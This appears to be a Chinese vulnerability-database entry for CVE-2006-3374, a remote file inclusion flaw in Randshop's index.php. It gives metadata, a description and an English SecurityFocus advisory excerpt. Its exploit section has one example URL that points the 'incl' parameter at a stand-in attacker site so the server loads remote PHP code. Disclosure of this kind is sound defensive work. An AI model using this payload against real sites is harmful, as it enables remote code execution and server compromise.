Randshop 'Index.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110559 漏洞类型 输入验证
发布时间 2006-07-04 更新时间 2006-07-07
CVE编号 CVE-2006-3374 CNNVD-ID CNNVD-200607-062
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28162
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-062
|漏洞详情
Randshop1.2及之前版本,包括0.9.3版本的core/editor.php存在PHP远程文件包含漏洞。远程攻击者可借助incl参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/18809/info

Randshop is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

http://www.example.com/randshop/index.php?incl=http://attacker's site
|参考资料

来源:BID
名称:18809
链接:http://www.securityfocus.com/bid/18809
来源:BUGTRAQ
名称:20060704Re:fileincludeexploitsinrandshopv1.2
链接:http://www.securityfocus.com/archive/1/archive/1/439063/100/0/threaded
来源:BUGTRAQ
名称:20060704fileincludeexploitsinrandshopv1.2
链接:http://www.securityfocus.com/archive/1/archive/1/439040/100/0/threaded
来源:SECTRACK
名称:1016438
链接:http://securitytracker.com/id?1016438